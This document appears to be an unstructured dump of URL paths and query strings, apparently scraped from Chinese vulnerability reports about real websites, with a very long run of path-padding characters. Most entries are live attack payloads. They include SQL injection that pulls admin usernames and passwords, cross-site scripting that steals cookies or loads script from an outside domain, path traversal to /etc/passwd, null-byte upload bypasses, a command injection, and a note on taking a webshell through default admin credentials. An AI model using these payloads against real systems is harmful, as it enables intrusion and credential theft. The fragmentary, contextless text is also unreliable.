//api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23 / / /guise.txt / /english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
./././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ /statuses/destroy?keyfrom=main.body.button&1307444373294&cost=1244 /Zodiac/submit.php提交查询时,返回网站路径信息。 / /457563?url=http://www.qq.com /zdn_dy_detail.php?nid=3820%20and%201=2%20union%20select%20user(),database(),version() /redirect.php?tid=4301507&goto=lastpost#lastpost /appframe.php?adtag=applist_authspace&appid=14&width=1&frame=http://www.pkav.net /dict/history_txt.php?id=1227”可根据ID下载大量搜狗官方的明文词库。 /FCK/editor/filemanager/browser/default/connectors/test.html /news/news_list.php?key=%CA%D6%BB%FA%B2%E9%D1%AF'+and+1=2+union+select+1%2C2%2C3%2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2Cdatabase()%2C /j/remarks/new 4,'type':'S-x /widget/articles/50245/article/10011038/ /wow/zones.php?c=2 /show.php?picId=7356 /programs/view/ciLg9GRQycc/ /phpinfo.php /test.asp /zhuanti/zt/k2/message.php?id=279\ 
/bnf10000/view/download/down.jsp?path=/../../etc/&filename=passwd /DZ-xss-0day/%29 /wiki/map/index.php?title=adf';alert(1);a= /show.php?picId=7172 /p__z /xisigr/profile / /PxZHoxn?id= /mblog/publish.php?rnd= /attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd= / /message/addmsg.php?rnd= /images/t.js' /pub/topic" /xxx.js /service/carecenter/detail.asp?id=4723 /PxZHoxn?id= /mblog/publish.php?rnd= /attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd= / /message/addmsg.php?rnd= /images/t.js' /pub/topic" weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src=//www.病毒地址.cn/images/t.js%3e%3c/script%3e?type=update /img/index/shell.php /robots.txt uc.myroman.com /action/index.php/show_one_info/id/349928 alert(1)// /js.js www.lashou.com登录后,cookie中保存了login_name2以及pwd2,相当危险)。 www.sdo.com,如果被用于钓鱼,成功率会很高 /search.php?key=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&SearchFromTop=1&catalog= /forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V /forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V /person/appjobs.php?id=48011 /v2.0/main/credit/portal_creditcard.shtml?url=http://www.pkav.net /movie/123456/comment_hot /lists / /search?q=a@&c=3 /system/2011/05/11/050936197.shtml /fangchan/index_all.php?table=109&n=75&width=125&height=160&s=5&widths=900 /tools/collegecost/collegecost.jsp?college_id=7966 /utsidakang/index.php?_c=utsidakang%27%3Cscript%3Ealert%28/x/%29%3C/script%3E&_a=upload&uid=9208 /resin-doc/features/migrate.xtp /Login?return_url=%22%3E%3Cscript%3Ealert%28/%C7%E7%CC%EC%D0%A1%D6%FD%20%C4%BEJJ/%29%3C/script%3E%3C /ajaxlogin.php?framelogin=1&callback=aleralertt /traf/ /products/670-686-690.html/x.asp http://adm.baidu.com/account/register.jsp?e=%D3%C3%BB%A7%C3%FB%B2%BB%BF%C9%D3%C3%3C/script%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E&userName=hexiaogen&mail=1269721185@qq.com 
/account/.register.jsp?e=%D3%C3%BB%A7%C3%FB%B2%BB%BF%C9%D3%C3%3C/script%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E&userName=hexiaogen&mail=1269721185@qq.com adm.baidu.com /account/.register.jsp?e=%D3%C3%BB%A7%C3%FB%B2%BB%BF%C9%D3%C3%3C/script%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E&userName=hexiaogen&mail=1269721185@qq.com /survey.php /k/%E6%9D%8E%E6%98%8C%E5%A5%8E%E5%88%A4%E6%AD%BB%E7%BC%93%E5%BC%95%E4%BA%89%E8%AE%AE /hack.txt /down.jsp?url=Templates/20110314.pptx /content_help.php?module=content_helpmessagelist&helpid=help/zh-CN/help_133.html /content_help.php?module=content_helpmessagelist&helpid=../../../../etc/passwd /web/transcode.jsp?pg=webz&url=www.568wyt.com /viewflash.htm?title=网站有漏洞&url=http://img1.126.net/channel1/rollGame0107.swf /search_1_0_0_%3Cscript%3Ealert%28%2F红颜知己%2F%29%3C%2Fscript%3E testor testor /reps/get_client_list存在注入 /info/xinwen/2011-07/48637.html/x.php /user/game_login.php?game_id=18&server_id=3%22%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E /wiki/MYML/invite/my:req-choice/login.html /R_Society/InteriroNewJob.aspx www.dzwww.com/rzboc1985/smilea/inc/UpFileFrame.asp /z/1111+and+1=2+union+select+1,2,user(),4,5/*/ /cms/motor/tagselect/tags/star_1269+and+1=2 /cms/motor/tagselect/tags/star_1269+and+1=1 /gujing/pkmore1.php?id=-401%20UnIOn%20sElEcT%201,2,uSeR(),4,5,daTAbAse(),GROUp_CoNcat(ColUMN_NaMe),VERsiON(),9,@@DatADIR,11,12,13,14,15,16%20from%20information_schema.COluMns%20whERe%20TABle_NAme=0x64765F61646D696E /fanta/ctl_award.php?action=index /gem/mu1.php /dologin.api /search/tag/?query=%3Cscript%3Ealert%28%2F%BA%EC%D1%D5%D6%AA%BC%BA%2F%29%3C%2Fscript%3E /search/tag/?url=http://www.baidu.com /contacts/?category=upload /news_nr.php?id=-1104 /c.php?t=blog&ts=bpost&k=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&stype=title /adminz/shouts.php?id=714&act=look /SinaEditor//Edit/editor/img.htm /class/smarty/internals/ /class/fck/editor/filemanager/connectors/php/upload.php /class/fck/editor/filemanager/connectors/php/connector.php 
/class/fck/editor/filemanager/connectors/php/config.php /news_nr.php?id=1000-1%2b1 /news_nr.php?id=1000 /s?bs=AAA&f=8&wd=BBB&inputT=862 /crossdomain.xml /gujing/more.php?%3E%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C%2Fscript%3E=123 /search.php?key=%3Cscript%3Ealert%28%22finger%22%29%3C%2Fscript%3E%3C%2Fspan%3E /skins/search.php?word=||| /gujing/pkmore1.php?id=401 /news/news_list.php?key=%CA%D6%BB%FA%B2%E9%D1%AF'+and+1=2+union+select+1%2C2%2C3%2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2Cdatabase()%2C /Flash/stat_hits.php?itemid=6463 /code.php?mod=list&itemid=&path=/test&file=../../config/config_ucenter.php /show_1_n.php?pid=1057 /support_1.php?cid=2%20and%201=2%20union%20select%201,2,username,4,pwd,6,7,8,9,10,11,12%20from%20fgt_admin /WAPUSER/900918.dos D27CDB6E-AE6D-11cf-96B8-444553540000 /789kk/8877.swf /789kk/8877.swf /),在搜索栏中输入“黑客帝国2”,点击搜索,应用程序出现异常,爆出网站绝对路径以及php路径 / /shopadmin/index.php?ctl=passport&act=login /shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../../&istheme=1 /shopadmin/index.php#ctl=system/template&act=editor&p[0]=../../&p[1]=index.php /software/download?soft=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.jpg /SysImages/File/sb.txt /cn/domain_info.txt /cn/domain_reason.txt /cn/error0.csv /cn/error1.csv /cn/error2.csv /extensions.php?E_name=jscms2&length=46&&num=6&order=postdate&pre=0&type=cid&id=12%27+and+1=1/* / /product.html /controls/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx /BankBJ/FundBase/fundgk.aspx?symbol=070008 /bccbpb/accountLogon.jsp?language=%22%3E%3Cscript%3Edocument.body.innerHTML%20=%20%27%20wooyun%CA%C7%B8%F6%BA%C3%B5%D8%B7%BD%20,%CE%D2%B5%C4%B4%ED.%27%3C/script%3E%22%3C /mail.asp /attachment.php?aid=660355%27 /resin-doc/viewfile/?file=index.jsp 
/tl/search.php?classStr=%bf%27&str=%3Cscript%3Ealert%28%2Fx%2F%29%3C%2Fscript%3E&imageField.x=0&imageField.y=0&a=1&a=2&a=3&a=4&a=5&a=6&a=7&a=8&a=9&a=10 /vcode/getvcode_js.php?callback=jsonpRes%22%3E%3Cscript%3Ealert%28/%C7%E7%CC%EC%D0%A1%D6%FD/%29%3C/script%3E /index.php?c=admin&a=ok /index.php?c=wish&a=.index&page=69 /index.php?c=uploadpic&a=uploadTS /index.php?c=winwin&a=index/../../admin/index.php%00& /goods.do?method=selPastGoods&conditionStr=%22%3E%3Cscript%3Ealert%28/%C7%E7%CC%EC%D0%A1%D6%FD/%29%3C/script%3E&pageNo=0&zoning=0%27 /zwds/csym_show.jsp?id=-359%20and%201=11%20union%20select%20user(),2,3,4,5,@@version,database(),8,conn,10,11,12,13,14,15,16,17,18 /merchant/mmodule/css/common/%22onmouseover=prompt%28/my_god_akast/%29%3E /index_detail.php?iid=9262%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C%22 /index.php /shopadmin/index.php?ctl=system/template&act=dlpkg&p[0]=../../ /index.php /shopadmin/index.php?ctl=system/template&act=dlpkg&p[0]=../../ /shopadmin/index.php#ctl=system/template&act=removePage&p[0]=此地方填要删除的目录 /login.php?goto_page= /test.js / /search.php?all_sun=all_sun&button=%e6%90%9c%e7%b4%a2%e7%bb%93%e6%9e%9c&end_price=&keywords=%27%22%28%29%26%251 / my5t3ry Set /user/reg/regajax.asp?action=getcityoption&province=%2527%2520%2575%256e%2569%256f%256e%2520%2553%2565%256c%2565%2563%2574%2520%2574%256f%2570%2520%2531%2530%2520%2541%2564%256d%2569%256e%2549%2544%252c%2555%2573%2565%2572%254e%2561%256d%2565%2526%2563%2568%2572%2528%2531%2532%2534%2529%2526%2550%2561%2573%2573%2557%256f%2572%2564%2520%2546%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 /user/reg/regajax.asp?action=getcityoption&province=%25i /wow/obj.php?id=-181557&z=3518 /celebrity/celebritytype.php?type=8 /vote/data/detail_vote/290b873e69f2ec33a1e0c9f2?alt=html&callback=window.alert%28document.cookie%29&t=1294931209000 /main.php?b=hi /show.php?id=152 /show.php?id=152 /bbs/index.html)--不停的搜索以下内容: / 
/_JSON_Page_User_Getgold.php?method=sendInvite¶meters=%5B%225447055%22%5D product.asp?Iheeoid= ASP/Default.html后台/SouthidcEditor/admin/login.asp默认帐号admin密码admin888拿webshell /experience/ /的方法取文件路径,最后执行,即可。 www.joomla.cn /gf/project/choice/ /licenses/gpl-2.0.html www.joomla.cn /gf/project/choice/ /administrator/language/zh-CN/xxxxxx.php /foo/?p=24&m=search&keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23 / / /cgi-bin/qzshare/cgi_qzshare_urlcheck?url=http://wooyun.org /docs/en/template.resources.tpl#templates.from.string /docs/en/language.syntax.variables.tpl /match/api/share/id/630 /match/api/share/id/630%20and /织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root index.php?m=hotelinfo /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin /admin/frame.php /?mod=activity&act=activitydetail&activity_id=70 /hwmarket/security/login-user.do /dd /#app=key_ /dev_creg.php /dev_creg.php /tuan-3d0159719a408986 / /mobile/register.jsp?step=../../../../../../../../../../etc/passwd%00.png /sheyingdasai/iframe/upload.php?sid=26 /resource/index.php /json?action=SEND_NOTE_ACTION&sendMobile=159********%20&msg=Hi&familyID=361009&isReplay=1&playAction=1&createBy=admin //spdgzsy.php /2ji.php?page_style=%27%20onmouseover%3dprompt%28302667234%29%20bad%3d%27 /companyBranch.aspx?str=850存在SQL注射漏洞 /kuaidi.php?com=%7B0%7D&nu=%7B1%7D&key=%7B2%7D%20key=%3Ciframe%20src=http://www.ihbqc.com /bjgjj/17563805.nms?urlInfo=1,37068219770713841000,713713,GJJ006983794 /?random=0.9689430042142064&id=news_20110826000166 /share/parse?link=http://www.baidu.com/?a= /images/cnlogo.gif%00.php / / /showcase/context.vm?layout=../z.gif /images/mydisk_sample.jpg%00.php /images/default/logo.gif%00.php 
/editor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F /editor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/可上传shell文件,只做了简单的测试,没有成功。但不能保证可拦截所有形式的恶意文件上传。 /upload/duowan/20101205/x1.jsp /globalsearch/?mssearch=%22%3E%3Cscript%3Ealert%28%2Fxss-by-VIP%2F%29%3C%2Fscript%3E /ptinfo/safecenter/getpwd/ChgPwdStepOldPwd.aspx?showbindmobile=1 /mymanzuo/dealp?oid=7745182 /mymanzuo/dealp?oid=7745183 /mymanzuo/dealp?oid=7745184 /mymanzuo/dealp?oid=7745185 /mymanzuo/dealp?oid=xxxxxxx /mymanzuo/dealp?oid= /cgi-bin/xajh_xb?action=0&location_no=aaa&street_name=娱乐城 alert(document.cookie) /video.asp?uid=1519420908&gid=3174160&cid=286332744&videourl=xxx /bbs /aa.php /order_bill/print_bill/45388 /plus/search.php?keyword=xxxx&channeltype=-0&orderby=&kwtype=-1&pagesize=10&typeid=0&TotalResult=-336&PageNo=%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3EFuck%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C&plistgo=%C7%E7%CC%EC%D0%A1%D6%FD /144764511 /api.php?op=get_keywords&number=1&data=11 /api/get_keywords.php tool.phpcms.cn/api/get_keywords.php /air/?w=n&c=/../../../../../../../../../../../etc/passwd%00.html&a=dismiss&g= /air/?w=n&c=/../../../../../../../../../usr/local/nginx/conf/nginx.conf%00.html&a=dismiss&g /modify_all.php?action=change%22%3e%3cscript%3ealert /psu?/593272d7-8334-4f0f-81dd-5f1237b9b751/urMY8X.IlGSeaO9v97Hpv2QJmI6S3p9pjHR4RlIV41A!/b/YXpoWSpmbAAAYrXkVypebQAA /psu?/chouxiaozi/urMY8X.IlGSeaO9v97Hpv2QJmI6S3p9pjHR4RlIV41A!/b/YXpoWSpmbAAAYrXkVypebQAA /psu?/593272d7-8334-4f0f-81dd-5f1237b9b751/DUks9wEtblfotC4pB0VsEuvkDgsT5fq0hDNQ4HPv5eQ!/b/Yci5STa1GQAAYszNTDb8GQAA /psu?/chouxiaozi/这里加上你的数据 /psu?/chouxiaozi/DUks9wEtblfotC4pB0VsEuvkDgsT5fq0hDNQ4HPv5eQ!/b/Yci5STa1GQAAYszNTDb8GQAA /c?d=ifeng&i=z,0,0&u= /publicforum/articleslist/0/tianyaphoto.shtml /show_v3.html /api/desk/download.php?file=../../../../../../../etc/passwd 
/uitem/ucenter/a.html?callback=%2B%2Fv9+%2BADw-script%2BAD4-alert%28xss%29%2BADw-%2Fscript%2BAD4- /uitem/ucenter/a.html?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg- /csxs_gr.php?id=28 /images/qdpic_1.jpg/1.php /csxs_gr.php?id=28 /fjalsdiw /down.php?uri= /down.php?uri=http://www.xxx.com/exe.exe /down.php?uri=http://www.xxx.com/rar.rar /!service/share?image=1%22%20onerror=%22alert%281%29&href=&name= /mts?wd=%3Ciframe%2F**%2Fsrc%3D%22%2F%2Fwooyun.org%22%3E&box=1 /maineditor.do?good_id= /html/f.html这个URL /cgi-bin/php-cgi/html/svpnphp/ctrlmn/mnlist.php /dpool/bbs/viewthread.php?pm=edu--1343430&subid=0%3E%22%3E%3CScRiPt%3Ealert%28/1/%29%3C/ScRiPt%3E /msearch/webs/columbus/search?&qd=fs /myxw/news.jsP /readNews.jsP / /fenghuang/game/game_introduction_list.jsp?id=110220301000 /luxury/list.php?type=character&eid=A /tomos/ui/qnupload.jsp?id=dazqh /common/modules/mail/houseweek_more.php?id=-313+union /WebAccounts/getPwd.do?flag=3&password=123456&cust_no=xxxxx&user_name=xxxxx /?mo=site&fo=site_modify&siteid=4451 /?kw=%22%3E%3Cimg%20src%3D1%20onerror%3Dalert%28document.cookie%29%20width%3D0%20height%3D0%3E%3Cdiv /zx2/eqinfo.php?id=25294 /phpcms/index.php?m=content&c=push&a=init&module=&action=position_asdfsadf /product_info.php?id=33 /1.txt /index.php?pid=293 /expansion/fckeditor/editor/filemanager/connectors/test.html /expansion/fckeditor/editor/filemanager/connectors/uploadtest.html /list.php?fid=1 /mapp/admin/admin_dream.jsp?category_id=0 /iask/paper/paper.php?id=470&date=2011-05-21%3CScRiPt%3Ealert%28/cl.4m.bz/%29%3C%2fScRiPt%3E /admin/error/no_privilege.htm /party/party_oldinfo.php?pid=4139 /do/search.php?keyword=wooyun%22%27%3E%3Cscript%3Ealert%28/youstar/%29%3C/script%3E /chat_proxy.php?callback=%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ewooyun&id=3500001&_=1317569023359 /city_detail.php?id=96 
/svc/pm/sms?uccpara=fx%3Dmob1649%60ver%3D7.8.0.87%60sn%3D1107-1034964554-ca8b8b78%60cver%3DNone%60width%3D240%60height%3D320%60ua%3DNOKIAN78%60ip%3D221.176.88.9%60nbr%3D%60fr%3Dsis%60ln%3Dzh_CN%60disp%3D%60feature_bit1%3D1144486655%60lang%3Dzh-cn%60pfid%3D28%60sms_no%3D%252B8613800898500%60ch%3Dadmin%40auto*%60mdn%3D%60prd%3DUCBrowser%60via%3DHTTP%2F1.1%2520HIHK-PS-WAP2-SV09-WAP3%2520(infoX-WISG%2C%2520Huawei%2520Technologies)%60innerip%3D221.176.88.9%60bid%3D800%60wi%3D%60li%3Dg9qKibW4p5yD14qJ*6sy4%2Fa04CxvqSR1dqA17u%2FrpHc0Ic%3D%60pver%3D3.1%60gi%3D%60btype%3DUM%60imei%3D354175026825200%60cp%3Disp%3A%25E7%25A7%25BB%25E5%258A%25A8%3Bprov%3A%25E6%25B5%25B7%25E5%258D%2597%3Bcity%3A%25E6%25B5%25B7%25E5%258F%25A3%3Bver%3A7.8.0.87%60bseq%3D11061716%60nt%3D0%60bmode%3DP3W%60imsi%3D460026089040783%60vcode%3D707d6399 /?"+XmlHttp.responsetext /ibm/console/secure/logon.do /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL project.youku.com/diy/upload.php /content/cache/user /content/cache/options /report/6kbbs-report.pdf /grid2008/detail.aspx?QueryID=3&CurRec=1 /signup/students.php?lang=zh-cn&entry=weiyonghu&url=http://weibo.com/dichan /signup/signup.php?lang=zh-cn /zhuyan/limeng5/weibo/taobao/weidishang/0929/9.html?cid=zRNmE63q&wbVersion=v3&wbuserid=2386024584%27%29%2Balert%28%22xss_by_bruce%22%29%2B%28%27 /redir.php?url=url.ifeng.com/Kdeh /gonggao.php?id=4 /gonggao.php?id=-4 /路径:C:\Inetpub\wwwroot /flash.php?fgid=21 /asp/76153.html[/url absolute 18px 40px hidden /handlers/LoginService.ashx?jsonp= alert(String.fromCharCode(88,83,83)) /web2.0 /web2.0/cfkjh.asp /web2.0/get.asp /web2.0/gift.asp /web2.0/index.asp /web2.0/intro.asp /web2.0/login.asp /web2.0/move.asp /web2.0/move1.asp /web2.0/move2.asp /web2.0/search.asp /web2.0/show.asp /web2.0/Validate.asp /.svn/entries /dianying/list.php?action=forumright zeracker/ /search/company/%22%3E%3Ciframe+onload%3Dalert%28document.domain%29%3E 
/search/school/%22%3E%3Ciframe%20onload%3Dalert%28document.domain%29%3E /search/user/%22%3E%3Ciframe%20onload%3Dalert%28document.domain%29%3E /search/tag/%22%3E%3Ciframe%20onload%3Dalert%28document.domain%29%3E /search/venue/test%22%3E%3Ciframe%20onload%3Dalert%28document.domain%29%3E /tag/%22%3E%3Ciframe%20onload%3Dalert%28document.domain%29%3E /home#search?q=fanfou'%3E%3Ciframe%20onload%3Dalert(%2FXSS%2F)%3E /boshi/home.php?action=forumright zerackernQQ:2036234 /boshi/test/home.php?action=forumright zerackernQQ:2036234 /admin1/login.php /test/phpinfo.php /static/getlist.php /static/getlistclass.php /index.php/youyan_content/getRepliesTogether/time /index.php/youyan?title=%E5%9B%BD%E5%86%852%E4%BA%BA%E5%88%9B%E4%B8%泄露了文件路径。 /manage/generally/login.php /moneditor/cs/game/gameResult.html?categoryId=&orderby=&ordertype=&categoryname= /admin/acu_test_5Itlt.asp /install/install.php /notice/upload_list.php?page='%3E%3Cscript%3Ealert()%3C/script%3E / /api/sina/login_api_sina.php / /search?hl=zh-CN&lr=&newwindow=1&safe=strict&biw=1365&bih=670&q=site%3Asina.com++index+of&oq=site%3Asina.com++index+of&aq=f&aqi=&aql=1&gs_sm=e&gs_upl=3886l6577l0l6816l11l8l0l0l0l0l658l658l5-1l1l0 /manager/html /manager/html /examples/jsp/dates/date.jsp /do/job.php?job=recommend&fid=101&id=8983 /script/redirect.php?class=china&action=http://www.baidu.com /就可以对应出新浪游戏的cgi地址。 /ecpclientdown/download.do?file=../../../../etc/hosts /js/pv.js /art/200812/101865_1.htm wap.ecplive.cn/ecpclientdown/download.do?file=../../../../../../../../../etc/passwd /search.php?query= /shequ/mu_center/muc_topicdetail.php?name=%22%3E%3Ciframe%20onload%3Dalert(document.domain)%3E /shequ/mu_center/muc_attention_list.php?key=%22%3E%3Ciframe+onload%3Dalert%28document.domain%29%3E&type=list&sinaid=2181491501&atten=0 sae.sina.com.cn/?m=coopmng&a=invite&app_id=wooyun&to_invite=someone@somedomain.com&role=other&priv[]=priv_deploy&inviteWords=hi,dude / insight /x.js /74cmsv3/templates/default/footer.php 
/2011/0819/bxn/post_vote.php?id=142 /news.php?id=31 /hxr-geren.php?pid=32 /api/icms.php?c=2 /fck/editor/filemanager/connectors/test.html /hodocs/admin/ /changyoutw/admin/爆绝对路径 /changyoutw/fck/ /home/ps/ps-req-fillform.htm /public/theme/search/?q=1234%27%2Balert%280%29%2B%27 /author/login /admin/login.jsp /2011/05/ldz0511/manage_imageabc/index.htm /xyqdata/admin_manage/login_1.php /admin_manage/login_1.php /admin_manage/index.php /v2/pages/admin/welcome.jsp /bk_manage/login.php?url=index.php /lol_skin/pts/admin/login_1.php?goto= /UID/status /hi%5Fheige/css/item/2792357ee092f60829388a60.css)中发现一处代码 expression /do/schools.php?f_id=8&a_id=2883 /do/schools.php?f_id=8&a_id=2883 /asngMu相信群里大部分的人都认识她。大家看看就好,切莫说出其名!”,利用短网址逃避腾讯恶意网站检测并伪装成QZONE空间诱骗用户输入QQ密码。 /ajax_request_friend.do?from=sg_guide_peopleumayknow_profile& /sobb/sobb-07.txt /.svn/entries /getpassword.asp /UserCenter/register.aspx /siteserver /server-info /server-status /v/b/63946504-2386024584.html /zh_about.asp?id=3 /images/logo.gif/1.php Insight-labs /match/api/share/?id=537 /subscribe.php /search_1_0_0_%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E /trust/index/detail/trustid/1/%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E /hercloset/358232/2154/1/0/0/%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E /cms/motor/artselect/keyword/%22%20onmouseover=alert%28123456%29%20bad=%22/t/1/page/1/timeera/0 /.htaccess /db.sql /manage/login.php /user/account/login /user/account/login Insight-labs /search.php?encode=YToyOntzOjg6ImtleXdvcmRzIjtzOjMxOiI%2bPHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4gIjtzOjE4OiJzZWFyY2hfZW5jb2RlX3RpbWUiO2k6MTMxOTgwNzk0Mzt9 /affiche.php?ad_id=34&uri=[URL /arrival/a.htm?to=[URL /arrival/a.htm?to=[URL /arrival/a.htm?to=[URL /messagewall/blessingsListAction.do?path=../ /photographs/show_page.php?id=420 /SysHome.do?origURL= /nantiankb/admin/article/article/DownloadTFile.do?file=vfltg3jxvkb2(1).html /card/viewCard.do?historyId=5129675&checksum=73e818cd75ddceffd4a400af7ad6178f 
/?c=spr_web_sina_zhengwen_ent_t001'%20aND%20'8'='8 /?c=spr_web_sina_zhengwen_ent_t001'%20aND%20'8'='3 /feedback/?product= http://emarketing.163.com/163today/163today_online.php /user/upload/img/show/%25u9EA6%25u901A5%252C%25u5B89%25u6208%252Cyayahi%252C7709599003.html?callback=%3Cscript%3Ealert%28/insight_labs/%29%3C/script%3E /detail/qimila/3741808 /浅谈绕过waf的数种方法.html /c:/windows/win.ini pma="http://www.phpmyadmin.net/some_doc_url/ structure_schemas database table table database structure_schemas www.51qljr.com www.51qljr.com /qly/clair_ls_txt.jsp?rid=54290 /qly/clair_ls_txt.jsp?rid=54290 http://forum.book.sina.com.cn/faq.php?action=search&searchsubmit=yes /ggxl/list.asp?news_id=329%20and%20%281%29=%281%29 /ggxl/list.asp?news_id=329%20%20or%201%20in%20%281,2,3,4,5,6%29 / /list.php?channel=&c=&year=INSIGHT000002%22%3E%27%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3C%27&dpc=1 ///phpinfo.php /eventdetail.php?eid=15201 /sinamall/manager/login.asp?redir=merchant%2Eadmin%2Easp&shortname=hsugn /auction/auction_detail.php?id=-2645+union+select+1,2,GROUP_CONCAT%28DISTINCT+COLUMN_NAME%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name=0x6175746F5F757365725F636F6D6D你懂的! 
/cooperate/itoolbar/tb_tg?callback= /news_show.asp?id=5 /stopright.asp?keyword=%27+and+1=2+union+select+1,user%28%29,3,4,5,6%23 /hd/bjsqx/config/chkMess.php?msid=要删除的ID&action=del /hd/bjsqx/config/chkMess.php /eventlist.php?status=1&etype=1&order= /payhistory/myaddress.aspx?addr_id=10000&cid=1&op=bindselected /cgi-bin/picDiy/upload.cgi?imgurl=;ls%20-la%20/ /admin/ /admin/ /admin/login.php?errmsg=%22%3E%3Cscript%3Ealert%28/insight/%29%3C/script%3E /upload/admin/index.php?adminsid=802ad20c1483922311071eb0d92d52b5 /xx_gry.php?id=42099 /admin/index.php unknown-linux-gnu /admin/index.php /admin/index.php?page=1931%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E xxx4444xxx /search_ad.php?url=//wooyun.org /file/clowu7ct /page/article/search.asp?query=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&space=2&rn=20 /data/backupdata/dede_admin_0_74b930959d6ee431.txt /data/backupdata/dede_member_0_2b61cee8137bf896.txt /file/clowu7ct /cgi/mc?funcid=getusrnewmsgcnt&fid=1&addSubFdrs=1&language=0&style=0&template=newmsgres_setcookie.htm&callback= /cgi/mc?funcid=getusrnewmsgcnt&fid=1&addSubFdrs=1&language=0&style=0&template=newmsgres_setcookie.htm&callback= 